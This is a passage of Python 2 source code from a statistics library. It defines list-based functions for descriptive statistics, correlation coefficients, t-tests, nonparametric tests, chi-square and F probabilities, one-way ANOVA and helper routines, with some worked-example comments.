Usage: lsem(inlist)
"""
sd = stdev(inlist)
n = len(inlist)
return sd/math.sqrt(n)
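# Worked example for the N-1 family above, using [1, 2, 3, 4, 5]:
#   lvar   -> sum of squared deviations 10 / (5-1)  = 2.5
#   lstdev -> sqrt(2.5)                            ~= 1.5811
#   lsem   -> 1.5811 / sqrt(5)                     ~= 0.7071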
def lz (inlist, score):
"""
Returns the z-score for a given input score, given that score and the
list from which that score came. Not appropriate for population calculations.
Usage: lz(inlist, score)
"""
z = (score-mean(inlist))/samplestdev(inlist)
return z
def lzs (inlist):
"""
Returns a list of z-scores, one for each score in the passed list.
Usage: lzs(inlist)
"""
zscores = []
for item in inlist:
zscores.append(z(inlist,item))
return zscores
####################################
####### TRIMMING FUNCTIONS #######
####################################
def ltrimboth (l,proportiontocut):
"""
Slices off the passed proportion of items from BOTH ends of the passed
list (i.e., with proportiontocut=0.1, slices 'leftmost' 10% AND 'rightmost'
10% of scores). Assumes list is sorted by magnitude. Slices off LESS if
proportion results in a non-integer slice index (i.e., conservatively
slices off proportiontocut).
Usage: ltrimboth (l,proportiontocut)
Returns: trimmed version of list l
"""
lowercut = int(proportiontocut*len(l))
uppercut = len(l) - lowercut
return l[lowercut:uppercut]
def ltrim1 (l,proportiontocut,tail='right'):
"""
Slices off the passed proportion of items from ONE end of the passed
list (i.e., if proportiontocut=0.1, slices off 'leftmost' or 'rightmost'
10% of scores). Slices off LESS if proportion results in a non-integer
slice index (i.e., conservatively slices off proportiontocut).
Usage: ltrim1 (l,proportiontocut,tail='right') or set tail='left'
Returns: trimmed version of list l
"""
if tail == 'right':
lowercut = 0
uppercut = len(l) - int(proportiontocut*len(l))
elif tail == 'left':
lowercut = int(proportiontocut*len(l))
uppercut = len(l)
return l[lowercut:uppercut]
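# e.g., with l = range(10) (already sorted):
#   ltrimboth(l, 0.1)       -> [1, 2, 3, 4, 5, 6, 7, 8]  (drops 0 and 9)
#   ltrim1(l, 0.2, 'right') -> [0, 1, 2, 3, 4, 5, 6, 7]  (drops 8 and 9)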
####################################
##### CORRELATION FUNCTIONS ######
####################################
def lpaired(x,y):
"""
Interactively determines the type of data and then runs the
appropriate statistic for paired group data.
Usage: lpaired(x,y)
Returns: appropriate statistic name, value, and probability
"""
samples = ''
while samples not in ['i','r','I','R','c','C']:
print '\nIndependent or related samples, or correlation (i,r,c): ',
samples = raw_input()
if samples in ['i','I','r','R']:
print '\nComparing variances ...',
# USE O'BRIEN'S TEST FOR HOMOGENEITY OF VARIANCE, Maxwell & Delaney, p.112
r = obrientransform(x,y)
f,p = F_oneway(pstat.colex(r,0),pstat.colex(r,1))
if p<0.05:
vartype='unequal, p='+str(round(p,4))
else:
vartype='equal'
print vartype
if samples in ['i','I']:
if vartype[0]=='e':
t,p = ttest_ind(x,y,0)
print '\nIndependent samples t-test: ', round(t,4),round(p,4)
else:
if len(x)>20 or len(y)>20:
z,p = ranksums(x,y)
print '\nRank Sums test (NONparametric, n>20): ', round(z,4),round(p,4)
else:
u,p = mannwhitneyu(x,y)
print '\nMann-Whitney U-test (NONparametric, ns<20): ', round(u,4),round(p,4)
else: # RELATED SAMPLES
if vartype[0]=='e':
t,p = ttest_rel(x,y,0)
print '\nRelated samples t-test: ', round(t,4),round(p,4)
else:
t,p = ranksums(x,y)
print '\nWilcoxon T-test (NONparametric): ', round(t,4),round(p,4)
else: # CORRELATION ANALYSIS
corrtype = ''
while corrtype not in ['c','C','r','R','d','D']:
print '\nIs the data Continuous, Ranked, or Dichotomous (c,r,d): ',
corrtype = raw_input()
if corrtype in ['c','C']:
m,b,r,p,see = linregress(x,y)
print '\nLinear regression for continuous variables ...'
lol = [['Slope','Intercept','r','Prob','SEestimate'],[round(m,4),round(b,4),round(r,4),round(p,4),round(see,4)]]
pstat.printcc(lol)
elif corrtype in ['r','R']:
r,p = spearmanr(x,y)
print '\nCorrelation for ranked variables ...'
print "Spearman's r: ",round(r,4),round(p,4)
else: # DICHOTOMOUS
r,p = pointbiserialr(x,y)
print '\nAssuming x contains a dichotomous variable ...'
print 'Point Biserial r: ',round(r,4),round(p,4)
print '\n\n'
return None
def lpearsonr(x,y):
"""
Calculates a Pearson correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (2nd), p.195.
Usage: lpearsonr(x,y) where x and y are equal-length lists
Returns: Pearson's r value, two-tailed p-value
"""
TINY = 1.0e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in pearsonr. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_num = n*(summult(x,y)) - sum(x)*sum(y)
r_den = math.sqrt((n*ss(x) - square_of_sums(x))*(n*ss(y)-square_of_sums(y)))
r = (r_num / r_den) # denominator already a float
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/float(df+t*t))
return r, prob
def lorigin_pearsonr(x,y):
"""
Calculates a Pearson correlation coefficient and the associated
probability value for correlation through the origin. By Dylan Schwilk
Not yet tested.
Usage: lorigin_pearsonr(x,y) where x and y are equal-length lists
Returns: Pearson's r value, two-tailed p-value
"""
TINY = 1.0e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in origin_pearsonr. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_den = math.sqrt(ss(x) * ss(y))
r = summult(x,y) / r_den
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/float(df+t*t))
return r, prob
def lspearmanr(x,y):
"""
Calculates a Spearman rank-order correlation coefficient. Taken
from Heiman's Basic Statistics for the Behav. Sci (1st), p.192.
Usage: lspearmanr(x,y) where x and y are equal-length lists
Returns: Spearman's r, two-tailed p-value
"""
TINY = 1e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in spearmanr. Aborting.'
n = len(x)
rankx = rankdata(x)
ranky = rankdata(y)
dsq = sumdiffsquared(rankx,ranky)
rs = 1 - 6*dsq / float(n*(n**2-1))
t = rs * math.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
df = n-2
probrs = betai(0.5*df,0.5,df/(df+t*t)) # t already a float
# probability values for rs are from part 2 of the spearman function in
# Numerical Recipes, p.510. They are close to tables, but not exact. (?)
return rs, probrs
def lpointbiserialr(x,y):
"""
Calculates a point-biserial correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (1st), p.194.
Usage: lpointbiserialr(x,y) where x,y are equal-length lists
Returns: Point-biserial r, two-tailed p-value
"""
TINY = 1e-30
if len(x) <> len(y):
raise ValueError, 'INPUT VALUES NOT PAIRED IN pointbiserialr. ABORTING.'
data = pstat.abut(x,y)
categories = pstat.unique(x)
if len(categories) <> 2:
raise ValueError, "Exactly 2 categories required for pointbiserialr()."
else: # there are 2 categories, continue
codemap = pstat.abut(categories,range(2))
recoded = pstat.recode(data,codemap,0)
x = pstat.linexand(data,0,categories[0])
y = pstat.linexand(data,0,categories[1])
xmean = mean(pstat.colex(x,1))
ymean = mean(pstat.colex(y,1))
n = len(data)
adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))
rpb = (ymean - xmean)/samplestdev(pstat.colex(data,1))*adjust
df = n-2
t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))
prob = betai(0.5*df,0.5,df/(df+t*t)) # t already a float
return rpb, prob
def lkendalltau(x,y):
"""
Calculates Kendall's tau ... correlation of ordinal data. Adapted
from function kendl1 in Numerical Recipes. Needs a good test routine. @@@
Usage: lkendalltau(x,y)
Returns: Kendall's tau, two-tailed p-value
"""
n1 = 0
n2 = 0
iss = 0
for j in range(len(x)-1):
for k in range(j+1,len(y)): # start at j+1 so a pair is never compared with itself
a1 = x[j] - x[k]
a2 = y[j] - y[k]
aa = a1 * a2
if (aa): # neither list has a tie
n1 = n1 + 1
n2 = n2 + 1
if aa > 0:
iss = iss + 1
else:
iss = iss -1
else: # at least one list is tied for this pair; per Numerical Recipes,
# a pair tied in BOTH lists counts toward neither denominator
if (a1):
n1 = n1 + 1
if (a2):
n2 = n2 + 1
tau = iss / math.sqrt(n1*n2)
svar = (4.0*len(x)+10.0) / (9.0*len(x)*(len(x)-1))
z = tau / math.sqrt(svar)
prob = erfcc(abs(z)/1.4142136)
return tau, prob
def llinregress(x,y):
"""
Calculates a regression line on x,y pairs.
Usage: llinregress(x,y) x,y are equal-length lists of x-y coordinates
Returns: slope, intercept, r, two-tailed prob, sterr-of-estimate
"""
TINY = 1.0e-20
if len(x) <> len(y):
raise ValueError, 'Input values not paired in linregress. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_num = float(n*(summult(x,y)) - sum(x)*sum(y))
r_den = math.sqrt((n*ss(x) - square_of_sums(x))*(n*ss(y)-square_of_sums(y)))
r = r_num / r_den
z = 0.5*math.log((1.0+r+TINY)/(1.0-r+TINY))
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/(df+t*t))
slope = r_num / float(n*ss(x) - square_of_sums(x))
intercept = ymean - slope*xmean
sterrest = math.sqrt(1-r*r)*samplestdev(y)
return slope, intercept, r, prob, sterrest
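# Sanity check with an exact linear relation, y = 2x + 1:
#   llinregress([1, 2, 3, 4], [3, 5, 7, 9])
# should give slope 2.0, intercept 1.0, r = 1.0, a p-value near zero, and a
# standard error of estimate of 0.0.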
####################################
##### INFERENTIAL STATISTICS #####
####################################
def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):
"""
Calculates the t-obtained for the independent samples T-test on ONE group
of scores a, given a population mean. If printit=1, results are printed
to the screen. If printit='filename', the results are output to 'filename'
using the given writemode (default=append). Returns t-value, and prob.
Usage: lttest_1samp(a,popmean,Name='Sample',printit=0,writemode='a')
Returns: t-value, two-tailed prob
"""
x = mean(a)
v = var(a)
n = len(a)
df = n-1
svar = ((n-1)*v)/float(df)
t = (x-popmean)/math.sqrt(svar*(1.0/n))
prob = betai(0.5*df,0.5,float(df)/(df+t*t))
if printit <> 0:
statname = 'Single-sample T-test.'
outputpairedstats(printit,writemode,
'Population','--',popmean,0,0,0,
name,n,x,v,min(a),max(a),
statname,t,prob)
return t,prob
def lttest_ind (a, b, printit=0, name1='Samp1', name2='Samp2', writemode='a'):
"""
Calculates the t-obtained T-test on TWO INDEPENDENT samples of
scores a and b. From Numerical Recipes, p.483. If printit=1, results
are printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Returns t-value,
and prob.
Usage: lttest_ind(a,b,printit=0,name1='Samp1',name2='Samp2',writemode='a')
Returns: t-value, two-tailed prob
"""
x1 = mean(a)
x2 = mean(b)
v1 = stdev(a)**2
v2 = stdev(b)**2
n1 = len(a)
n2 = len(b)
df = n1+n2-2
svar = ((n1-1)*v1+(n2-1)*v2)/float(df)
t = (x1-x2)/math.sqrt(svar*(1.0/n1 + 1.0/n2))
prob = betai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Independent samples T-test.'
outputpairedstats(printit,writemode,
name1,n1,x1,v1,min(a),max(a),
name2,n2,x2,v2,min(b),max(b),
statname,t,prob)
return t,prob
def lttest_rel (a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO RELATED samples of scores,
a and b. From Numerical Recipes, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output to
'filename' using the given writemode (default=append). Returns t-value,
and prob.
Usage: lttest_rel(a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a')
Returns: t-value, two-tailed prob
"""
if len(a)<>len(b):
raise ValueError, 'Unequal length lists in ttest_rel.'
x1 = mean(a)
x2 = mean(b)
v1 = var(a)
v2 = var(b)
n = len(a)
cov = 0
for i in range(len(a)):
cov = cov + (a[i]-x1) * (b[i]-x2)
df = n-1
cov = cov / float(df)
sd = math.sqrt((v1+v2 - 2.0*cov)/float(n))
t = (x1-x2)/sd
prob = betai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Related samples T-test.'
outputpairedstats(printit,writemode,
name1,n,x1,v1,min(a),max(a),
name2,n,x2,v2,min(b),max(b),
statname,t,prob)
return t, prob
def lchisquare(f_obs,f_exp=None):
"""
Calculates a one-way chi square for list of observed frequencies and returns
the result. If no expected frequencies are given, the total N is assumed to
be equally distributed across all groups.
Usage: lchisquare(f_obs, f_exp=None) f_obs = list of observed cell freq.
Returns: chisquare-statistic, associated p-value
"""
k = len(f_obs) # number of groups
if f_exp == None:
f_exp = [sum(f_obs)/float(k)] * len(f_obs) # create k bins with = freq.
chisq = 0
for i in range(len(f_obs)):
chisq = chisq + (f_obs[i]-f_exp[i])**2 / float(f_exp[i])
return chisq, chisqprob(chisq, k-1)
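# e.g., lchisquare([10, 10, 10, 10]) tests against a uniform expectation of
# [10.0, 10.0, 10.0, 10.0], giving chisq = 0.0 and p = 1.0 (a perfect fit).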
def lks_2samp (data1,data2):
"""
Computes the Kolmogorov-Smirnov statistic on 2 samples. From
Numerical Recipes in C, page 493.
Usage: lks_2samp(data1,data2) data1&2 are lists of values for 2 conditions
Returns: KS D-value, associated p-value
"""
j1 = 0
j2 = 0
fn1 = 0.0
fn2 = 0.0
n1 = len(data1)
n2 = len(data2)
en1 = n1
en2 = n2
d = 0.0
data1.sort()
data2.sort()
while j1 < n1 and j2 < n2:
d1=data1[j1]
d2=data2[j2]
if d1 <= d2:
fn1 = (j1)/float(en1)
j1 = j1 + 1
if d2 <= d1:
fn2 = (j2)/float(en2)
j2 = j2 + 1
dt = (fn2-fn1)
if math.fabs(dt) > math.fabs(d):
d = dt
try:
en = math.sqrt(en1*en2/float(en1+en2))
prob = ksprob((en+0.12+0.11/en)*abs(d))
except:
prob = 1.0
return d, prob
def lmannwhitneyu(x,y):
"""
Calculates a Mann-Whitney U statistic on the provided scores and
returns the result. Use only when the n in each condition is < 20 and
you have 2 independent samples of ranks. NOTE: Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U found in the tables. Equivalent to Kruskal-Wallis H with
just 2 groups.
Usage: lmannwhitneyu(x,y) where x,y are lists of scores for the 2 groups
Returns: u-statistic, one-tailed p-value (i.e., p(z(U)))
"""
n1 = len(x)
n2 = len(y)
ranked = rankdata(x+y)
rankx = ranked[0:n1] # get the x-ranks
ranky = ranked[n1:] # the rest are y-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - sum(rankx) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
bigu = max(u1,u2)
smallu = min(u1,u2)
T = math.sqrt(tiecorrect(ranked)) # correction factor for tied scores
if T == 0:
raise ValueError, 'All numbers are identical in lmannwhitneyu'
sd = math.sqrt(T*n1*n2*(n1+n2+1)/12.0)
z = abs((bigu-n1*n2/2.0) / sd) # normal approximation for prob calc
return smallu, 1.0 - zprob(z)
def ltiecorrect(rankvals):
"""
Corrects for ties in Mann Whitney U and Kruskal Wallis H tests. See
Siegel, S. (1956) Nonparametric Statistics for the Behavioral Sciences.
New York: McGraw-Hill. Code adapted from |Stat rankind.c code.
Usage: ltiecorrect(rankvals)
Returns: T correction factor for U or H
"""
sorted,posn = shellsort(rankvals)
n = len(sorted)
T = 0.0
i = 0
while (i<n-1):
if sorted[i] == sorted[i+1]:
nties = 1
while (i<n-1) and (sorted[i] == sorted[i+1]):
nties = nties +1
i = i +1
T = T + nties**3 - nties
i = i+1
T = T / float(n**3-n)
return 1.0 - T
def lranksums(x,y):
"""
Calculates the rank sums statistic on the provided scores and
returns the result. Use only when the n in each condition is > 20 and you
have 2 independent samples of ranks.
Usage: lranksums(x,y)
Returns: a z-statistic, two-tailed p-value
"""
n1 = len(x)
n2 = len(y)
alldata = x+y
ranked = rankdata(alldata)
x = ranked[:n1]
y = ranked[n1:]
s = sum(x)
expected = n1*(n1+n2+1) / 2.0
z = (s - expected) / math.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2*(1.0 -zprob(abs(z)))
return z, prob
def lwilcoxont(x,y):
"""
Calculates the Wilcoxon T-test for related samples and returns the
result. A non-parametric T-test.
Usage: lwilcoxont(x,y)
Returns: a t-statistic, two-tail probability estimate
"""
if len(x) <> len(y):
raise ValueError, 'Unequal N in wilcoxont. Aborting.'
d=[]
for i in range(len(x)):
diff = x[i] - y[i]
if diff <> 0:
d.append(diff)
count = len(d)
absd = map(abs,d)
absranked = rankdata(absd)
r_plus = 0.0
r_minus = 0.0
for i in range(len(absd)):
if d[i] < 0:
r_minus = r_minus + absranked[i]
else:
r_plus = r_plus + absranked[i]
wt = min(r_plus, r_minus)
mn = count * (count+1) * 0.25
se = math.sqrt(count*(count+1)*(2.0*count+1.0)/24.0)
z = math.fabs(wt-mn) / se
prob = 2*(1.0 -zprob(abs(z)))
return wt, prob
def lkruskalwallish(*args):
"""
The Kruskal-Wallis H-test is a non-parametric ANOVA for 3 or more
groups, requiring at least 5 subjects in each group. This function
calculates the Kruskal-Wallis H-test for 3 or more independent samples
and returns the result.
Usage: lkruskalwallish(*args)
Returns: H-statistic (corrected for ties), associated p-value
"""
args = list(args)
n = [0]*len(args)
all = []
n = map(len,args)
for i in range(len(args)):
all = all + args[i]
ranked = rankdata(all)
T = tiecorrect(ranked)
for i in range(len(args)):
args[i] = ranked[0:n[i]]
del ranked[0:n[i]]
rsums = []
for i in range(len(args)):
rsums.append(sum(args[i])**2)
rsums[i] = rsums[i] / float(n[i])
ssbn = sum(rsums)
totaln = sum(n)
h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)
df = len(args) - 1
if T == 0:
raise ValueError, 'All numbers are identical in lkruskalwallish'
h = h / float(T)
return h, chisqprob(h,df)
def lfriedmanchisquare(*args):
"""
Friedman Chi-Square is a non-parametric, one-way within-subjects
ANOVA. This function calculates the Friedman Chi-square test for repeated
measures and returns the result, along with the associated probability
value. It assumes 3 or more repeated measures. With only 3 levels, a
minimum of 10 subjects is required; four levels requires 5 subjects per
level (??).
Usage: lfriedmanchisquare(*args)
Returns: chi-square statistic, associated p-value
"""
k = len(args)
if k < 3:
raise ValueError, 'Less than 3 levels. Friedman test not appropriate.'
n = len(args[0])
data = apply(pstat.abut,tuple(args))
for i in range(len(data)):
data[i] = rankdata(data[i])
ssbn = 0
for i in range(k):
ssbn = ssbn + sum(pstat.colex(data,i))**2 # sum the RANKS within condition i, not the raw scores
chisq = 12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)
return chisq, chisqprob(chisq,k-1)
####################################
#### PROBABILITY CALCULATIONS ####
####################################
def lchisqprob(chisq,df):
"""
Returns the (1-tailed) probability value associated with the provided
chi-square value and df. Adapted from chisq.c in Gary Perlman's |Stat.
Usage: lchisqprob(chisq,df)
"""
BIG = 20.0
def ex(x):
BIG = 20.0
if x < -BIG:
return 0.0
else:
return math.exp(x)
if chisq <=0 or df < 1:
return 1.0
a = 0.5 * chisq
if df%2 == 0:
even = 1
else:
even = 0
if df > 1:
y = ex(-a)
if even:
s = y
else:
s = 2.0 * zprob(-math.sqrt(chisq))
if (df > 2):
chisq = 0.5 * (df - 1.0)
if even:
z = 1.0
else:
z = 0.5
if a > BIG:
if even:
e = 0.0
else:
e = math.log(math.sqrt(math.pi))
c = math.log(a)
while (z <= chisq):
e = math.log(z) + e
s = s + ex(c*z-a-e)
z = z + 1.0
return s
else:
if even:
e = 1.0
else:
e = 1.0 / math.sqrt(math.pi) / math.sqrt(a)
c = 0.0
while (z <= chisq):
e = e * (a/float(z))
c = c + e
z = z + 1.0
return (c*y+s)
else:
return s
def lerfcc(x):
"""
Returns the complementary error function erfc(x) with fractional
error everywhere less than 1.2e-7. Adapted from Numerical Recipes.
Usage: lerfcc(x)
"""
z = abs(x)
t = 1.0 / (1.0+0.5*z)
ans = t * math.exp(-z*z-1.26551223 + t*(1.00002368+t*(0.37409196+t*(0.09678418+t*(-0.18628806+t*(0.27886807+t*(-1.13520398+t*(1.48851587+t*(-0.82215223+t*0.17087277)))))))))
if x >= 0:
return ans
else:
return 2.0 - ans
def lzprob(z):
"""
Returns the area under the normal curve 'to the left of' the given z value.
Thus,
for z<0, zprob(z) = 1-tail probability
for z>0, 1.0-zprob(z) = 1-tail probability
for any z, 2.0*(1.0-zprob(abs(z))) = 2-tail probability
Adapted from z.c in Gary Perlman's |Stat.
Usage: lzprob(z)
"""
Z_MAX = 6.0 # maximum meaningful z-value
if z == 0.0:
x = 0.0
else:
y = 0.5 * math.fabs(z)
if y >= (Z_MAX*0.5):
x = 1.0
elif (y < 1.0):
w = y*y
x = ((((((((0.000124818987 * w
-0.001075204047) * w +0.005198775019) * w
-0.019198292004) * w +0.059054035642) * w
-0.151968751364) * w +0.319152932694) * w
-0.531923007300) * w +0.797884560593) * y * 2.0
else:
y = y - 2.0
x = (((((((((((((-0.000045255659 * y
+0.000152529290) * y -0.000019538132) * y
-0.000676904986) * y +0.001390604284) * y
-0.000794620820) * y -0.002034254874) * y
+0.006549791214) * y -0.010557625006) * y
+0.011630447319) * y -0.009279453341) * y
+0.005353579108) * y -0.002141268741) * y
+0.000535310849) * y +0.999936657524
if z > 0.0:
prob = ((x+1.0)*0.5)
else:
prob = ((1.0-x)*0.5)
return prob
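# e.g., lzprob(0.0) -> 0.5 (half the area lies left of the mean), and
# lzprob(6.0) -> 1.0, since 6 is treated as the maximum meaningful z (Z_MAX).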
def lksprob(alam):
"""
Computes a Kolmogorov-Smirnov test significance level. Adapted from
Numerical Recipes.
Usage: lksprob(alam)
"""
fac = 2.0
sum = 0.0
termbf = 0.0
a2 = -2.0*alam*alam
for j in range(1,201):
term = fac*math.exp(a2*j*j)
sum = sum + term
if math.fabs(term) <= (0.001*termbf) or math.fabs(term) < (1.0e-8*sum):
return sum
fac = -fac
termbf = math.fabs(term)
return 1.0 # Get here only if fails to converge; was 0.0!!
def lfprob (dfnum, dfden, F):
"""
Returns the (1-tailed) significance level (p-value) of an F
statistic given the degrees of freedom for the numerator (dfR-dfF) and
the degrees of freedom for the denominator (dfF).
Usage: lfprob(dfnum, dfden, F) where usually dfnum=dfbn, dfden=dfwn
"""
p = betai(0.5*dfden, 0.5*dfnum, dfden/float(dfden+dfnum*F))
return p
def lbetacf(a,b,x):
"""
This function evaluates the continued fraction form of the incomplete
Beta function, betai. (Adapted from: Numerical Recipes in C.)
Usage: lbetacf(a,b,x)
"""
ITMAX = 200
EPS = 3.0e-7
bm = az = am = 1.0
qab = a+b
qap = a+1.0
qam = a-1.0
bz = 1.0-qab*x/qap
for i in range(ITMAX+1):
em = float(i+1)
tem = em + em
d = em*(b-em)*x/((qam+tem)*(a+tem))
ap = az + d*am
bp = bz+d*bm
d = -(a+em)*(qab+em)*x/((qap+tem)*(a+tem))
app = ap+d*az
bpp = bp+d*bz
aold = az
am = ap/bpp
bm = bp/bpp
az = app/bpp
bz = 1.0
if (abs(az-aold)<(EPS*abs(az))):
return az
print 'a or b too big, or ITMAX too small in Betacf.'
def lgammln(xx):
"""
Returns the gamma function of xx.
Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
(Adapted from: Numerical Recipes in C.)
Usage: lgammln(xx)
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*math.log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + math.log(2.50662827465*ser)
def lbetai(a,b,x):
"""
Returns the incomplete beta function:
I-sub-x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)
where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
function of a. The continued fraction formulation is implemented here,
using the betacf function. (Adapted from: Numerical Recipes in C.)
Usage: lbetai(a,b,x)
"""
if (x<0.0 or x>1.0):
raise ValueError, 'Bad x in lbetai'
if (x==0.0 or x==1.0):
bt = 0.0
else:
bt = math.exp(gammln(a+b)-gammln(a)-gammln(b)+a*math.log(x)+b*
math.log(1.0-x))
if (x<(a+1.0)/(a+b+2.0)):
return bt*betacf(a,b,x)/float(a)
else:
return 1.0-bt*betacf(b,a,1.0-x)/float(b)
####################################
####### ANOVA CALCULATIONS #######
####################################
def lF_oneway(*lists):
"""
Performs a 1-way ANOVA, returning an F-value and probability given
any number of groups. From Heiman, pp.394-7.
Usage: F_oneway(*lists) where *lists is any number of lists, one per
treatment group
Returns: F value, one-tailed p-value
"""
a = len(lists) # ANOVA on 'a' groups, each in its own list
alldata = []
for i in range(len(lists)):
alldata = alldata + lists[i]
bign = len(alldata)
# use the list-based helpers here; the array names (N, amean, avar, ass,
# asquare_of_sums) belong to the NumPy section and are undefined for lists
sstot = ss(alldata)-(square_of_sums(alldata)/float(bign))
ssbn = 0
for list in lists:
ssbn = ssbn + square_of_sums(list)/float(len(list))
ssbn = ssbn - (square_of_sums(alldata)/float(bign))
sswn = sstot-ssbn
dfbn = a-1
dfwn = bign - a
msb = ssbn/float(dfbn)
msw = sswn/float(dfwn)
f = msb/msw
prob = fprob(dfbn,dfwn,f)
return f, prob
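# Hand-checked example (two groups, using the list helpers above):
#   lF_oneway([1, 2, 3], [2, 3, 4])
# sstot = 43 - 225/6 = 5.5, ssbn = 12 + 27 - 37.5 = 1.5, sswn = 4.0,
# so F = (1.5/1) / (4.0/4) = 1.5; the p-value comes from fprob(1, 4, 1.5).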
def lF_value (ER,EF,dfnum,dfden):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfR-dfF = degrees of freedom of the numerator
dfF = degrees of freedom associated with the denominator/Full model
Usage: lF_value(ER,EF,dfnum,dfden)
"""
return ((ER-EF)/float(dfnum) / (EF/float(dfden)))
####################################
######## SUPPORT FUNCTIONS #######
####################################
def writecc (listoflists,file,writetype='w',extra=2):
"""
Writes a list of lists to a file in columns, customized by the max
size of items within the columns (max size of items in col, +2 characters)
to specified file. File-overwrite is the default.
Usage: writecc (listoflists,file,writetype='w',extra=2)
Returns: None
"""
if type(listoflists[0]) not in [ListType,TupleType]:
listoflists = [listoflists]
outfile = open(file,writetype)
rowstokill = []
list2print = copy.deepcopy(listoflists)
for i in range(len(listoflists)):
if listoflists[i] == ['\n'] or listoflists[i]=='\n' or listoflists[i]=='dashes':
rowstokill = rowstokill + [i]
rowstokill.reverse()
for row in rowstokill:
del list2print[row]
maxsize = [0]*len(list2print[0])
for col in range(len(list2print[0])):
items = pstat.colex(list2print,col)
items = map(pstat.makestr,items)
maxsize[col] = max(map(len,items)) + extra
for row in listoflists:
if row == ['\n'] or row == '\n':
outfile.write('\n')
elif row == ['dashes'] or row == 'dashes':
dashes = [0]*len(maxsize)
for j in range(len(maxsize)):
dashes[j] = '-'*(maxsize[j]-2)
outfile.write(pstat.lineincustcols(dashes,maxsize))
else:
outfile.write(pstat.lineincustcols(row,maxsize))
outfile.write('\n')
outfile.close()
return None
def lincr(l,cap): # to increment a list up to a max-list of 'cap'
"""
Simulate a counting system from an n-dimensional list.
Usage: lincr(l,cap) l=list to increment, cap=max values for each list pos'n
Returns: next set of values for list l, OR -1 (if overflow)
"""
l[0] = l[0] + 1 # e.g., [0,0,0] --> [2,4,3] (=cap)
for i in range(len(l)):
if l[i] > cap[i] and i < len(l)-1: # if carryover AND not done
l[i] = 0
l[i+1] = l[i+1] + 1
elif l[i] > cap[i] and i == len(l)-1: # overflow past last column, must be finished
l = -1
return l
def lsum (inlist):
"""
Returns the sum of the items in the passed list.
Usage: lsum(inlist)
"""
s = 0
for item in inlist:
s = s + item
return s
def lcumsum (inlist):
"""
Returns a list consisting of the cumulative sum of the items in the
passed list.
Usage: lcumsum(inlist)
"""
newlist = copy.deepcopy(inlist)
for i in range(1,len(newlist)):
newlist[i] = newlist[i] + newlist[i-1]
return newlist
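# e.g., lcumsum([1, 2, 3, 4]) -> [1, 3, 6, 10]; the input list is left intact
# (a deepcopy is modified instead).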
def lss(inlist):
"""
Squares each value in the passed list, adds up these squares and
returns the result.
Usage: lss(inlist)
"""
ss = 0
for item in inlist:
ss = ss + item*item
return ss
def lsummult (list1,list2):
"""
Multiplies elements in list1 and list2, element by element, and
returns the sum of all resulting multiplications. Must provide equal
length lists.
Usage: lsummult(list1,list2)
"""
if len(list1) <> len(list2):
raise ValueError, "Lists not equal length in summult."
s = 0
for item1,item2 in pstat.abut(list1,list2):
s = s + item1*item2
return s
def lsumdiffsquared(x,y):
"""
Takes pairwise differences of the values in lists x and y, squares
these differences, and returns the sum of these squares.
Usage: lsumdiffsquared(x,y)
Returns: sum[(x[i]-y[i])**2]
"""
sds = 0
for i in range(len(x)):
sds = sds + (x[i]-y[i])**2
return sds
def lsquare_of_sums(inlist):
"""
Adds the values in the passed list, squares the sum, and returns
the result.
Usage: lsquare_of_sums(inlist)
Returns: sum(inlist[i])**2
"""
s = sum(inlist)
return float(s)*s
def lshellsort(inlist):
"""
Shellsort algorithm. Sorts a 1D-list.
Usage: lshellsort(inlist)
Returns: sorted-inlist, sorting-index-vector (for original list)
"""
n = len(inlist)
svec = copy.deepcopy(inlist)
ivec = range(n)
gap = n/2 # integer division needed
while gap >0:
for i in range(gap,n):
for j in range(i-gap,-1,-gap):
while j>=0 and svec[j]>svec[j+gap]:
temp = svec[j]
svec[j] = svec[j+gap]
svec[j+gap] = temp
itemp = ivec[j]
ivec[j] = ivec[j+gap]
ivec[j+gap] = itemp
gap = gap / 2 # integer division needed
# svec is now sorted inlist, and ivec has the order svec[i] = vec[ivec[i]]
return svec, ivec
def lrankdata(inlist):
"""
